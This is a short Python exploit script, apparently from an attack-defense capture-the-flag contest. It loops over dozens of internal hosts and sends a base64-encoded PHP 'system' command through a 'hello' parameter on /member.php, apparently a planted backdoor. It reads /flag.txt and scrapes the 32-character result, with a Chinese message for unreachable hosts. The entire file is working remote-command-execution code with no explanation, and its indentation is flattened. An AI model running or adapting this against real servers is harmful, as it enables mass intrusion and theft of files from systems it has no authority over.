import requests, re, base64
weba_hosts = ["http://172.20.%s.103" % x for x in range(101,147)]
s = requests.session()
payload = base64.b64encode(b'system("cat /flag.txt");')
params = {"hello": payload}
for web_a in weba_hosts:
try:
resp = requests.get(url=web_a,timeout=1)
resp = s.get(web_a+"/member.php",params=params)
rs = re.search(r"\w{32}",resp.text)
print(web_a)
print(rs.group())
except:
print(web_a)
print("IP无法访问")